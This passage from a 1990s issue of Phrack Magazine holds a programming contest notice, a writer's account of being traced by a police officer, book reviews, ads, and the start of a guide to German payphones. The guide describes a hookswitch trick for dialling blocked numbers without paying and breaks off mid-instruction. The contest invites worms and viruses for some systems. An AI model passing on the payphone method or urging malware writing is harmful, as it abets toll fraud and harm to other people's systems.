  1548. ------------------------------------------------------------------------------
  1549.  
  1550.                         !! NEW PHRACK CONTEST !!
  1551.  
  1552. Phrack Magazine is sponsoring a programming contest open to anyone
  1553. who wishes to enter.
  1554.  
  1555. Write the Next Internet Worm!  Write the world's best X Windows wardialer!
  1556. Code something that makes COPS & SATAN look like high school Introduction
  1557. to Computing assignments.  Make the OKI 1150 a scanning, tracking, vampire-
  1558. phone.  Write an NLM!  Write a TSR!  Write a stupid game!  It doesn't
  1559. matter what you write, or what computer it's for!  It only matters that you
  1560. enter!
  1561.  
  1562. Win from the following prizes:
  1563.  
  1564.      Computer Hardware & Peripherals
  1565.      System Software
  1566.      Complete Compiler packages
  1567.      CD-ROMS
  1568.      T-Shirts
  1569.      Magazine Subscriptions
  1570.      and MANY MORE!
  1571.  
  1572. STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!
  1573.  
  1574. Enter the PHRACK PROGRAMMING CONTEST!
  1575.  
  1576. The rules are very simple:
  1577.  
  1578. 1)  All programs must be original works.  No submissions of
  1579.     previously copyrighted materials or works prepared by
  1580.     third parties will be judged.
  1581.  
  1582. 2)  All entries must be sent in as source code only.  Any programming
  1583.     language is acceptable.  Programs must compile and run without
  1584.     any modifications needed by the judges.  If programs are specific
  1585.     to certain platforms, please designate that platform.  If special
  1586.     hardware is needed, please specify what hardware is required.
  1587.     If include libraries are needed, they should be submitted in addition
  1588.     to the main program.
  1589.  
  1590. 3)  No virii accepted.  An exception may be made for such programs that
  1591.     are developed for operating systems other than AMIGA/Dos, System 7,
  1592.     MS-DOS (or variants), or OS/2.  Suitable exceptions could be, but are not
  1593.     limited to, UNIX (any variant), VMS or MVS.
  1594.  
  1595. 4)  Entries may be submitted via email or magnetic media.  Email should be
  1596.     directed to phrack@well.com.  Tapes, Diskettes or other storage
  1597.     media should be sent to
  1598.  
  1599.          Phrack Magazine
  1600.          603 W. 13th #1A-278
  1601.          Austin, TX 78701
  1602.  
  1603. 5)  Programs will be judged by a panel of judges based on programming skill
  1604.     displayed, originality, usability, user interface, documentation,
  1605.     and creativity.
  1606.  
  1607. 6)  Phrack Magazine will make no claims to the works submitted, and the
  1608.     rights to the software are understood to be retained by the program
  1609.     author.   However, by entering, the Author thereby grants Phrack Magazine
  1610.     permission to reprint the program source code in future issues.
  1611.  
  1612. 7)  All Entries must be received by 12-31-94.  Prizes to be awarded by 3-1-95.
  1613.  
  1614. -------------------------INCLUDE THIS FORM WITH ENTRY-------------------------
  1615.  
  1616. Author:
  1617.  
  1618. Email Address:
  1619.  
  1620. Mailing Address:
  1621.  
  1622.  
  1623.  
  1624. Program Name:
  1625.  
  1626.  
  1627. Description:
  1628.  
  1629.  
  1630.  
  1631.  
  1632. Hardware & Software Platform(s) Developed For:
  1633.  
  1634.  
  1635.  
  1636. Special Equipment Needed (modem, ethernet cards, sound cards, etc):
  1637.  
  1638.  
  1639.  
  1640. Other Comments:
  1641.  
  1642.  
  1643. ------------------------------------------------------------------------------
  1644.                              COMPUTER COP PROPHILE
  1645.                                FOLLOW-UP REPORT
  1646.  
  1647.                                LT. WILLIAM BAKER
  1648.                            JEFFERSON COUNTY POLICE
  1649.  
  1650.                                      by
  1651.  
  1652.                                 The Grimmace
  1653.  
  1654.  
  1655.  In PHRACK 43, I wrote an article on the life and times
  1656. of a computer cop operating out of the Jefferson County Police
  1657. Department in Louisville, Kentucky.  In the article, I included
  1658. a transcript of a taped interview with him that I did after
  1659. socially engineering my way through the cop-bureaucracy in his
  1660. department. At the time I thought it was a hell of an idea and a
  1661. lot of PHRACK readers probably got a good insight into how the
  1662. "other side" thinks.
  1663.  
  1664.  However, I made the terminal mistake of underestimating
  1665. the people I was dealing with by a LONG shot and felt that I
  1666. should write a short follow-up on what has transpired since that
  1667. article was published in PHRACK 43.
  1668.  
  1669.  A lot of the stuff in the article about Lt. Baker was
  1670. obtained by an attorney I know who has no reason to be friendly
  1671. to the cops.  He helped me get copies of court transcripts which
  1672. included tons of information on Baker's training and areas of
  1673. expertise.  Since the article, the attorney has refused to talk
  1674. to me and, it appears, that he's been identified as the source
  1675. of assistance in the article and all he will say to me is that
  1676. "I don't want any more trouble from that guy...forget where you
  1677. left my phone number."  Interesting...no elaboration...hang up.
  1678.  
  1679.  As I recall, the PHRACK 43 issue came out around
  1680. November 17th.  On November 20th, I received a telephone call
  1681. where I was living at the home of a friend of mine from Lt.
  1682. Baker who laughingly asked me if I needed any more information
  1683. for any "future articles".  I tried the "I don't know what
  1684. you're talking about" scam at which time he read to me my full
  1685. name, date of birth, social security number, employer, license
  1686. number of my car, and the serial number from a bicycle I just
  1687. purchased the day before.  I figured that he'd run a credit
  1688. history on me, but when I checked, there had been no inquiries
  1689. on my accounts for a year.  He told me the last 3 jobs I'd held
  1690. and where I bought my groceries and recited a list of BBSs I was
  1691. on (two of which under aliases other than The Grimmace).
  1692.  
  1693.  This guy had a way about him that made a chill run up my
  1694. spine and never once said the first threatening or abusive thing
  1695. to me. I suppose I figured that the cops were all idiots and
  1696. that I'd never hear anything more about the article and go on to
  1697. write some more about other computer cops using the same method.
  1698. I've now decided against it.
  1699.  
  1700.  I got the message...and the message was "You aren't the
  1701. only one who can hack out information."  I'd always expected to
  1702. get the typical "cop treatment" if I ever got caught doing
  1703. anything, but I think this was worse.  Hell, I never know where
  1704. the guy's gonna show up next.  I've received cryptic messages on
  1705. the IRC from a variety of accounts and servers all over the
  1706. country and on various "private" BBSs and got one on my birthday
  1707. on my Internet account...it traced back to an anonymous server
  1708. somewhere in the bowels of UCLA.  I don't know anyone at UCLA
  1709. and the internet account I have is an anonymous account actually
  1710. owned by another friend of mine.
  1711.  
  1712.  I think the point I'm trying to make is that all of us
  1713. have to be aware of how the cops think in order to protect
  1714. ourselves and the things we believe in.  But...shaking the
  1715. hornet's nest in order to see what comes out maybe isn't the
  1716. coolest way to investigate.
  1717.  
  1718.  Like I wrote in my previous article, we've all gotten a
  1719. big laugh from keystone cops like Foley and Golden, but things
  1720. may be changing.  Local and federal agencies are beginning to
  1721. cooperate on a regular basis and international agencies are also
  1722. beginning to join the party.
  1723.  
  1724.  The big push to eradicate child-pornography has led to a number of
  1725. hackers being caught in the search for the "dirty old men" on the Internet.
  1726. Baker was the Kentucky cop who was singularly responsible for the bust of the
  1727. big kiddie-porn FSP site at the University of Birmingham in England back
  1728. in April and got a lot of press coverage about it.  But I had personally
  1729. never considered that a cop could hack his way into a password-protected
  1730. FSP site.  And why would he care about something happening on the other
  1731. side of the world?  Hackers do it, but not cops...unless the cops are
  1732. hackers.  Hmmm...theories anyone?
  1733.  
  1734.  I don't live in Louisville anymore...not because of
  1735. Baker, but because of some other problems, but I still look over
  1736. my shoulder.  It would be easier if the guy was a prick, but I'm
  1737. more paranoid of the friendly good-ole boy than the raving
  1738. lunatic breaking in our front doors with a sledge hammer.  I
  1739. always thought we were safe because we knew so much more than
  1740. the people chasing us.  I'm not so certain of that anymore.
  1741.  
  1742.  So that's it.  I made the mistakes of 1) probably
  1743. embarrassing a guy who I thought would never be able to touch me
  1744. and 2), drawing attention to myself.  A hacker's primary
  1745. protection lies in his anonymity...those who live the high
  1746. profiles are the ones who take the falls and, although I haven't
  1747. fallen yet, I keep having the feeling that I'm standing on the
  1748. edge and that I know the guy sneaking up behind me.
  1749.  
  1750. From the shadows--
  1751.    The Grimmace
  1752.                       [HsL - RAt - UQQ]
  1753.  
  1754. ------------------------------------------------------------------------------
  1755.  
  1756.                               !! PHRACK READS  !!
  1757.  
  1758.                          "Cyberia" by Douglas Rushkoff
  1759.                             Review by Erik Bloodaxe
  1760.  
  1761. Imagine a book about drugs written by someone who never inhaled.
  1762. Imagine a book about raves written by someone saw a flyer once.
  1763. Imagine a book about computers by someone who someone who thinks
  1764.      a macintosh is complex.
  1765.  
  1766. Imagine an author trying to make a quick buck by writing about something
  1767.      his publisher said was hot and would sell.
  1768.  
  1769. And there you have Cyberia, by Douglas Rushkoff.
  1770.  
  1771. I have got to hand it to this amazing huckster Rushkoff, though.  By
  1772. publishing Cyberia, and simultaneously putting out "The Gen X Reader,"
  1773. (which by the way is unequaled in its insipidness), he has covered all
  1774. bases for the idiot masses to devour at the local bookseller.
  1775.  
  1776. Rushkoff has taken it upon himself to coin new terms such as
  1777. "Cyberia," the electronic world we live in; "Cyberians," the people
  1778. who live and play online; etc...
  1779.  
  1780. Like we needed more buzzwords to add to a world full of "Infobahns"
  1781. "console cowboys," and "phrackers."  Pardon me while I puke.
  1782.  
  1783. The "interviews" with various denizens of Rushkoff's "Cyberia" come off
  1784. as fake as if I were to attempt to publish an interview with Mao Tse Tung
  1785. in the next issue of Phrack.
  1786.  
  1787. We've got ravers talking on and on about "E" and having deep conversations
  1788. about smart drugs and quantum physics.  Let's see:  in the dozens of raves
  1789. I've been to in several states the deepest conversation that popped
  1790. up was "uh, do you have any more of that acid?" and "this mix is cool."
  1791. And these conversations were from the more eloquent of the nearly all under
  1792. 21 crowd that the events attracted.  Far from quantum physicians.
  1793. And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered
  1794. through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street
  1795. in the early 80's with my fake id and bought a pouch of the magic elixir over
  1796. the counter from the bartender (complete with printed instructions).
  1797. NOT "E."  But that's just nit-picking.
  1798.  
  1799. Now we have the psychedelic crowd.  Listening to the "Interviews" of these
  1800. jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
  1801. "Some individuals who have smoked Mary Jane, or Reefer oftimes turn to
  1802. harder drugs such as LSD."  That's not a quote from the book, but it may
  1803. as well be.  People constantly talk about "LSD-this" and "LSD-that."
  1804. Hell, if someone walked into a room and went on about how he enjoyed his
  1805. last "LSD experience" the way these people do, you'd think they were
  1806. really really stupid, or just a cop.  "Why no, we've never had any of
  1807. that acid stuff.  Is it like LSD?"  Please.
  1808.  
  1809. Then there are the DMT fruitcakes.  Boys and girls, DMT isn't being sold
  1810. on the street corner in Boise.  In fact, I think it would be easier for most
  1811. people to get a portable rocket launcher than DMT.  Nevertheless, in every
  1812. fucking piece of tripe published about the "new psychedlicia" DMT is
  1813. splattered all over it.  Just because Terrance Fucking McKenna
  1814. saw little pod people, does not mean it serves any high position
  1815. in the online community.
  1816.  
  1817. And Hackers?  Oh fuck me gently with a chainsaw, Douglas.  From Craig Neidorf's
  1818. hacker Epiphany while playing Adventure on his Atari VCS to Gail
  1819. Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik
  1820. was raided for the 3rd time.  PLEASE!  I'm sure Gail was up to her eyebrows
  1821. in bourbon, wearing a party hat and prank calling hackers saying "You're next,
  1822. my little pretty!"  Not looking for 3rd-rate schlock journalists to whine to.
  1823.  
  1824. The Smart Drink Girl?  The Mondo House?  Gee...how Cyber.  Thanks, but
  1825. no thanks.
  1826.  
  1827. I honestly don't know if Rushkoff really experienced any of this nonsense,
  1828. or if he actually stumbled on a few DMT crystals and smoked this
  1829. reality.  Let's just say, I think Mr. Rushkoff was absent the day
  1830. his professor discussed "Creative License in Journalism" and just decided
  1831. to wing it.
  1832.  
  1833. Actually, maybe San Francisco really is like this.  But NOWHERE else on
  1834. the planet can relate.  And shit, if I wanted to read a GOOD San
  1835. Francisco book, I'd reread Armistead Maupin's "Tales of the City."
  1836. This book should have been called "Everything I Needed to Know About
  1837. Cyber-Culture I Learned in Mondo-2000."
  1838.  
  1839. Seriously...anyone who reads this book and finds anything remotely
  1840. close to the reality of the various scenes it weakly attempts to
  1841. cover needs to email me immediately.  I have wiped my ass with
  1842. better pulp.
  1843.  
  1844. ------------------------------------------------------------------------------
  1845.  
  1846.                     BOOK REVIEW:  INFORMATION WARFARE
  1847.                    CHAOS ON THE ELECTRONIC SUPERHIGHWAY
  1848.                             By Winn Schwartau
  1849.  
  1850.  INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY
  1851.  By Winn Schwartau.  (C)opyright 1994 by the author
  1852.  Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
  1853.  ISBN 1-56025-080-1 - Price $22.95
  1854.  Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608
  1855.  (800) 788-3123
  1856.  
  1857.  Review by Scott Davis (dfox@fennec.com)
  1858.  (from tjoauc1-4  ftp: freeside.com /pub/tjoauc)
  1859.  
  1860.  If you only buy one book this year, make sure it is INFORMATION WARFARE!
  1861.  In my 10+ years of existing in cyberspace and seeing people and organizations
  1862.  debate, argue and contemplate security issues, laws, personal privacy,
  1863.  and solutions to all of these issues...and more, never have I seen a more
  1864.  definitive publication. In INFORMATION WARFARE,  Winn Schwartau simply
  1865.  draws the line on the debating. The information in this book is hard-core,
  1866.  factual documentation that leaves no doubt in this reader's mind that
  1867.  the world is in for a long, hard ride in regards to computer security.
  1868.  The United States is open to the world's electronic terrorists.
  1869.  When you finish reading this book, you will find out just how open we are.
  1870.  
  1871.  Mr. Schwartau talks about industrial espionage, hacking, viruses,
  1872.  eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
  1873.  magnetic weaponry, and the newest phrase of our generation...
  1874.  "Binary Schizophrenia". He exposes these topics from all angles. If you
  1875.  spend any amount of time in Cyberspace, this book is for you.
  1876.  
  1877.  How much do you depend on technology?
  1878.  
  1879.  ATM machines, credit cards, toasters, VCR's, televisions, computers,
  1880.  telephones, modems...the list goes on. You use technology and computers
  1881.  and don't even know it! But the point is...just how safe are you from
  1882.  invasion? How safe is our country's secrets? The fact is - they are NOT
  1883.  SAFE! How easy is it for someone you don't know to track your every move
  1884.  on a daily basis? VERY EASY! Are you a potential victim to fraud,
  1885.  breech of privacy, or general infractions against the way you carry
  1886.  on your daily activities?  YES! ...and you'd never guess how vulnerable
  1887.  we all are!
  1888.  
  1889.  This book will take you deep into places the government refuses to
  1890.  acknowledge. You should know about INFORMATION WARFARE. Order your
  1891.  copy today, or pick it up at your favorite book store. You will not
  1892.  regret it.
  1893.  
  1894. ------------------------------------------------------------------------------
  1895.  
  1896.       _Firewalls and Internet Security: Repelling the Wily Hacker_
  1897.  
  1898.               William R. Cheswick <ches@research.att.com>
  1899.                Steven M. Bellovin <smb@research.att.com>
  1900.  
  1901.                    Addison-Wesley, ISBN 0-201-63357-4
  1902.                          306 + XIV = 320 pages
  1903.                       (Printed on recycled paper)
  1904.  
  1905.                   A-Somewhat-Less-Enthusiastic-Review
  1906.  
  1907.                          Reviewed by Herd Beast
  1908.  
  1909. The back of this book claims that, "_Firewalls and Internet Security_
  1910. gives you invaluable advice and practical tools for protecting your
  1911. organization's computers from the very real threat of hacker attacks."
  1912. That is true.  The authors also add something from their knowledge of
  1913. these hacker attacks.  The book can be roughly separated into two
  1914. parts: Firewalls, and, you guessed it: Internet Security.  That is
  1915. how I see it.  The book itself is divided into four parts (Getting
  1916. Started, Building Your Own Firewall, A Look Back & Odds and Ends),
  1917. three appendixes, a bibliography, a list of 42 bombs and an index.
  1918.  
  1919. The book starts with overall explanations and an overview of the
  1920. TCP/IP protocol.  More than an overview of the actual TCP/IP protocol,
  1921. it is a review of services often used with that protocol, and the
  1922. security risks they pose.  In that chapter the authors define
  1923. "bombs" -- as particularly serious security risks.  Despite that fact,
  1924. and the tempting bomb list in the end, this book is not a guide for
  1925. someone with passing knowledge of Internet security who wants to learn
  1926. more explicit details about holes.  It is, in the authors' words, "not
  1927. a book on how to administer a system in a secure fashion."
  1928.  
  1929.  
  1930. FIREWALLS (Including the TCP/IP overview: pages 19-131)
  1931.  
  1932. What is a firewall and how is it built?(*)  If you don't know that,
  1933. then definitely get this book.  The Firewalls chapter is excellent
  1934. even for someone with a passing knowledge of firewalls or general
  1935. knowledge of what they set out to accomplish.  You might still
  1936. learn more.
  1937.  
  1938. In the Firewalls chapter, the authors explain the firewall philosophy
  1939. and types of firewalls.  Packet-filtering gateways rely on rule-based
  1940. packet filtering to protect the gateway from various types of attacks.
  1941. You can filter everything and achieve the same effect of disconnecting
  1942. from the Internet, you can filter everything from misbehaving sites,
  1943. you can allow only mail in, and so on.  An application-level gateway
  1944. relies on the applications set on the firewall.  Rather then let a
  1945. router filter traffic based on rules, one can strip a machine clean
  1946. and only run desired services -- and even then, more secure versions
  1947. of those services can be run.  Circuit-level gateways relay data
  1948. between the gateway and other networks.  The relay programs copy
  1949. data from inside the firewall to the outside, and log their activity.
  1950. Most firewalls on the Internet are a combination of these gateways.
  1951.  
  1952. Next, the authors explain how to build an application-level gateway
  1953. based on the work they have done with the research.att.com gateways.
  1954. As mentioned, this chapter is indeed very good.  They go over setting
  1955. up the firewall machines, router configuration for basic packet
  1956. filtering (such as not allowing Internet packets that appear to come
  1957. from inside your network).  They show, using the software on the
  1958. AT&T gateway as example, the general outline of proxies and give some
  1959. useful advise.  That chapter is very interesting; reading it with Bill
  1960. Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes
  1961. it even better.  The examples given, like the NFS and X proxies run on the
  1962. gateway, are also interesting by themselves.
  1963.  
  1964.  
  1965. INTERNET SECURITY (pages 133-237)
  1966.  
  1967. Internet security is a misleading name.  This part might also be
  1968. called "Everything else."  Most of it is a review of hacker attacks
  1969. logged by AT&T's gateway probes, and of their experience with a hacker.
  1970. But there is also a chapter dedicated to computer crime and the law --
  1971. computer crime statutes, log files as evidence, the legalities of
  1972. monitoring intruders and letting them keep their access after finding
  1973. them, and the ethics of many actions performed on the Internet; plus
  1974. an introduction to cryptography under Secure Communication over Insecure
  1975. Networks.  The later sections are good.  The explanation of several
  1976. encryption methods and short reviews of applications putting them to use
  1977. (PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
  1978. computer crime sections are also good -- although I'm not a lawyer and
  1979. therefore cannot really comment on it, and notes that look like "5 USC
  1980. 552a(b)(c)(10)" cause me to shudder.  It's interesting to note that some
  1981. administrative functions as presented in this book, what the authors call
  1982. counter-intelligence (reverse fingers and rusers) and booby traps and fake
  1983. password file are open for ethical debate.  Perhaps they are not illegal,
  1984. but counter-intelligence can surely ring the warning bells on the site being
  1985. counter-fingered if that site itself is security aware.
  1986.  
  1987. That said, let's move to hackers.  I refer to these as "hacker studies",
  1988. or whatever, for lack of a better name.  This is Part III (A Look
  1989. Back), which contains the methods of attacks (social engineering,
  1990. stealing passwords, etc), the Berferd incident (more on that later),
  1991. and an analysis (statistical and otherwise) of the Bell Labs gateway
  1992. logs.
  1993.  
  1994. Back to where we started, there is nothing new or innovative about
  1995. these chapters.  The Berferd hacker case is not new, it is mostly just
  1996. uninteresting.  The chapter is mostly a copy (they do state this) of
  1997. Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker
  1998. is Lured, Endured and Studied."  The chapter concerning probes and
  1999. door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
  2000. is mostly a copy (they do not state this) of Steven Bellovin's paper
  2001. titled, "There Be Dragons".  What do we learn from the hacker-related
  2002. chapters?  Let's take Berferd: The Sendmail DEBUG hole expert.  After
  2003. mailing himself a password file and receiving it with a space after
  2004. the username, he tries to add accounts in a similar fashion.  Cheswick
  2005. calls him "flexible".  I might have chosen another F-word.  Next are
  2006. the hacker logs.  People finger.  People tftp /etc/passwd.  People try
  2007. to rlogin as bin.  There are no advanced attacks in these sections.
  2008. Compared with the scary picture painted in the Firewalls chapter --
  2009. that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
  2010. NFS packets and much more -- something must have gone wrong.(**)
  2011.  
  2012. Still, I cannot say that this information is totally useless.  It is,
  2013. as mentioned, old.  It is available and was available since 1992
  2014. on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)
  2015.  
  2016. The bottom line is that this book is, in my opinion, foremost and upmost
  2017. a Firewaller's book.  The hacker section could have been condensed
  2018. into Appendix D, a copy of the CERT advisory about computer attacks
  2019. ("Don't use guest/guest.  Don't leave root unpassworded.")  It really
  2020. takes ignorance to believe that inexperienced hackers can learn "hacker
  2021. techniques" and become mean Internet break-in machines just by reading
  2022. _Firewalls and Internet Security_.  Yes, even the chapter dedicated
  2023. to trying to attack your own machine to test your security (The Hacker's
  2024. Workbench) is largely theoretical.  That is to say, it doesn't go above
  2025. comments like "attack NFS".  The probes and source code supplied there are
  2026. for programs like IP subnet scanners and so on, and not for "high-level"
  2027. stuff like ICMP bombers or similar software; only the attacks are
  2028. mentioned, not to implementation.  This is, by the way, quite
  2029. understandable and expected, but don't buy this book if you think it
  2030. will make you into some TCP/IP attacker wiz.
  2031.  
  2032. In summary:
  2033.  
  2034. THE GOOD
  2035.  
  2036. The Firewalls part is excellent.  The other parts not related to
  2037. hacker-tracking are good as well.  The added bonuses -- in the form
  2038. of a useful index, a full bibliography (with pointers to FTP sites),
  2039. a TCP port list with interesting comments and a great (running out
  2040. of positive descriptions here) online resources list -- are also
  2041. grand (whew).
  2042.  
  2043. THE BAD
  2044.  
  2045. The hacker studies sections, based on old (circa 1992) papers, are
  2046. not interesting for anyone with any knowledge of hacking and/or
  2047. security who had some sort of encounters with hackers.  People without
  2048. this knowledge might either get the idea that: (a) all hackers are
  2049. stupid and (b) all hackers are Berferd-style system formatters.  Based on
  2050. the fact that the authors do not make a clear-cut statement about
  2051. hiring or not hiring hackers, they just say that you should think
  2052. if you trust them, and that they generally appear not to have a total
  2053. draconian attitude towards hackers in general, I don't think this was
  2054. intentional.
  2055.  
  2056. THE UGLY (For the nitpickers)
  2057.  
  2058. There are some nasty little bugs in the book.  They're not errors
  2059. in that sense of the word; they're just kind of annoying -- if you're
  2060. sensitive about things like being called a hacker or a cracker, they'll
  2061. annoy you.  Try this: although they explain why they would use the term
  2062. "hacker" when referring to hackers (and not "eggsucker", or "cracker"),
  2063. they often use terms like "Those With Evil Intention".  Or, comparing
  2064. _2600 Magazine_ to the Computer underground Digest.
  2065.  
  2066. (*) From the Firewalls FAQ <fwalls-faq@tis.com>:
  2067.     ``A firewall is any one of several ways of protecting one
  2068.     network from another untrusted network. The actual mechanism
  2069.     whereby this is accomplished varies widely, but in
  2070.     principle, the firewall can be thought of as a pair of
  2071.     mechanisms: one which exists to block traffic, and the other
  2072.     which exists to permit traffic. Some firewalls place a
  2073.     greater emphasis on blocking traffic, while others emphasize
  2074.     permitting traffic.''
  2075.  
  2076. (**) This would be a great place to start a long and boring discussion
  2077.      about different types of hackers and how security (including firewalls)
  2078.      affect them.  But... I don't think so.
  2079.  
  2080. (***) ftp://research.att.com:/dist/internet_security/firewall.book also
  2081.       contains, in text and PostScript, the list of parts, chapters and
  2082.       sections in the book, and the Preface section.  For that reason,
  2083.       those sections weren't printed here.
  2084.       All the papers mentioned in this review can be found on that FTP
  2085.       site.
  2086.  
  2087. ------------------------------------------------------------------------------
  2088.  
  2089. Announcing Bellcore's Electronic Information Catalog for Industry
  2090. Clients...
  2091.  
  2092. To access the online catalog:
  2093.  
  2094.     telnet info.bellcore.com
  2095.     login: cat10
  2096.  
  2097.     or dial 201-829-2005
  2098.        annex: telnet info
  2099.        login: cat10
  2100.  
  2101. [Order up some E911 Documents Online!]
  2102.  
  2103. ------------------------------------------------------------------------------
  2104.  
  2105. TTTTT H   H EEEEE
  2106.   T   H   H E
  2107.   T   HHHHH EEEEE
  2108.   T   H   H E
  2109.   T   H   H EEEEE
  2110.  
  2111.              CCC  U   U RRRR  M   M U   U DDDD   GGG  EEEEE  OOO  N   N
  2112.             C   C U   U R   R MM MM U   U D   D G   G E     O   O NN  N
  2113.             C     U   U RRRR  M M M U   U D   D G     EEEEE O   O N N N
  2114.             C   C U   U R  R  M   M U   U D   D G  GG E     O   O N  NN
  2115.              CCC   UUU  R   R M   M  UUU  DDDD   GGG  EEEEE  OOO  N   N
  2116.  
  2117.        Bill Clinton promised good health care coverage for everyone.
  2118.           Bill Clinton promised jobs programs for the unemployed.
  2119. Bill Clinton promised that everyone who wanted could serve in the military.
  2120.            Bill Clinton promised a lot.  So does the Curmudgeon.
  2121.                  But unlike Bill Clinton, we'll deliver...
  2122.  
  2123. For only $10 a year (12 issues) you'll get alternative music reviews and
  2124. interviews, political reporting, anti-establishment features and
  2125. commentary, short fiction, movie reviews, book reviews, and humor.  Learn
  2126. the truth about the Gulf War, Clipper, and the Selective Service System.
  2127. Read everything you wanted to know about bands like the Offspring, R.E.M.,
  2128. the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and
  2129. Nine Inch Nails.  Become indoctrinated by commentary that just might change
  2130. the way you think about some things.  Subscribe to the Curmudgeon on paper for
  2131. $10 or electronically for free.  Electronic subscribers don't get
  2132. everything that paying subscribers do like photos, spoof ads, and some
  2133. articles.
  2134.  
  2135. Paper: send $10 check or money order to the Curmudgeon
  2136.      4505 University Way N.E.
  2137.      Box 555
  2138.      Seattle, Washington
  2139.        98105
  2140.    Electronic: send a request to rodneyl@u.washington.edu
  2141.  
  2142. ------------------------------------------------------------------------------
  2143.  
  2144.  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2145.  % The Journal Of American Underground Computing - ISSN 1074-3111 %
  2146.  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
  2147.  
  2148.  Computing - Communications - Politics - Security - Technology - Humor
  2149.  -Underground - Editorials - Reviews - News - Other Really Cool Stuff-
  2150.  
  2151.  Published Quarterly/Semi-Quarterly By Fennec Information Systems
  2152.  This is one of the more popular new electronic publications. To
  2153.  get your free subscription, please see the addresses below.
  2154.  Don't miss out on this newsworthy publication. We are getting
  2155.  hundreds of new subscriptions a month. This quarterly was promoted
  2156.  in Phrack Magazine. If you don't subscribe, you're only cheating
  2157.  yourself. Have a great day...and a similar tomorrow
  2158.  
  2159.  * Coming soon * A Windows-based help file containing all of the issues
  2160.                  of the magazine as well as extensive bio's of all of the
  2161.                  editors.
  2162.  
  2163.  Subscription Requests:  sub@fennec.com
  2164.  Comments to Editors  :  editors@fennec.com
  2165.  Back issues via Ftp  :  etext.archive.umich.edu  /pub/Zines/JAUC
  2166.                          fc.net   /pub/tjoauc
  2167.  
  2168.  Submissions          :  submit@fennec.com
  2169.  Finger info          :  dfox@fc.net and kahuna@fc.net
  2170.  
  2171. ------------------------------------------------------------------------------
  2172.  
  2173.         Make the best out of your European pay telephone
  2174.            by Onkel Dittmeyer, onkeld@ponton.hanse.de
  2175.  
  2176.       -----------------------------------------------------
  2177.  
  2178.   Okay guys and girls, let's come to a topic old like the creation
  2179. but yet never revealed. European, or, to be more exact, German pay
  2180. phone technology. Huh-huh.
  2181.  
  2182.   There are several models, round ones, rectangular ones, spiffy
  2183. looking ones, dull looking ones, and they all have one thing in
  2184. common: If they are something, they are not what the American reader
  2185. might think of a public pay telephone, unlike it's U.S. brothers,
  2186. the German payphones always operate off a regular customer-style
  2187. telephone line, and therefore they're basically all COCOTS, which
  2188. makes it a lot easier to screw around with them.
  2189.  
  2190.   Let's get on with the models here. You are dealing with two
  2191. classes; coin-op ones and card-op ones. All of them are made by
  2192. Siemens and TELEKOM. The coin-op ones are currently in the process
  2193. of becoming extinct while being replaced by the new card-op's, and rather
  2194. dull. Lacking all comfort, they just have a regular 3x4 keypad,
  2195. and they emit a cuckoo tone if you receive a call. The only way to
  2196. tamper with these is pure physical violence, which is still easier
  2197. than in the U.S.; these babies are no fortresses at all. Well, while
  2198. the coin-op models just offer you the opportunity of ripping off
  2199. their money by physically forcing them open, there is a lot more
  2200. fun involved if you're dealing with the card babies. They are really
  2201. spiffy looking, and I mean extraordinary spiffy. Still nothing
  2202. compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line
  2203. pixel-oriented LCD readout displays the pure K-Radness of it's
  2204. inventors. Therefore it is equipped with a 4x4 keypad that has a lot
  2205. of (undocumented) features like switching the mother into touch-tone
  2206. mode, redial, display block etc. Plus, you can toggle the readout
  2207. between German, English, and French. There are rumors that you can
  2208. put it into Mandarin as well, but that has not been confirmed yet.
  2209.  
  2210.   Let's get ahead. Since all payphones are operating on a regular
  2211. line, you can call them up. Most of them have a sign reading their
  2212. number, some don't. For those who don't, there is no way for you to
  2213. figure out their number, since they did not invent ANI yet over here
  2214. in the country famous for its good beer and yodel chants. Well, try
  2215. it. I know you thought about it. Call it collect. Dialing 010 will
  2216. drop you to a long-distance operator, just in case you didn't know.
  2217. He will connect the call, since there is no database with all the
  2218. payphone numbers, the payphone will ring, you pick up, the operator
  2219. will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?
  2220.  
  2221.   This would not be Phrack if there would be no way to screw it.
  2222. If you examine the hook switch on it closely, you will figure out
  2223. that, if you press it down real slow and carefully, there are two
  2224. levels at whom it provokes a function; the first will make the phone
  2225. hang up the line, the second one to reset itself. Let me make this
  2226. a little clearer in your mind.
  2227.  
  2228.                        -----         <--- totally released
  2229.                          |
  2230.                          |
  2231.                          |           <--- hang up line
  2232.  press to this level --> |
  2233.                          |           <--- reset
  2234.                          |
  2235.                        -----         <--- totally hung up
  2236.  
  2237.   Involves a little practice, though. Just try it. Dial a number
  2238. it will let you dial, like 0130, then it will just sit there and
  2239. wait for you to dial the rest of the number. Start pressing down
  2240. the hookswitch really slow till the line clicks away into suspense,
  2241. if you release it again it will return you to the dial tone and
  2242. you are now able to call numbers you aren't supposed to call, like
  2243. 010 (if you don't have a card, don't have one, that's not graceful),
  2244. or 001-212-456-1111. Problem is, the moment the other party picks
  2245. up, the phone will receive a charge subtraction tone, which is a
  2246. 16kHz buzz that will tell the payphone to rip the first charge unit,
  2247. 30 pfennigs, off your card, and if you don't have one inserted and
  2248. the phone fails to collect it, it will go on and reset itself
  2249. disconnecting the line. Bad luck. Still good enough to harass your
  2250. favorite fellas for free, but not exactly what we're looking for,
  2251. right? Try this one. Push the hook lever to the suspension point,
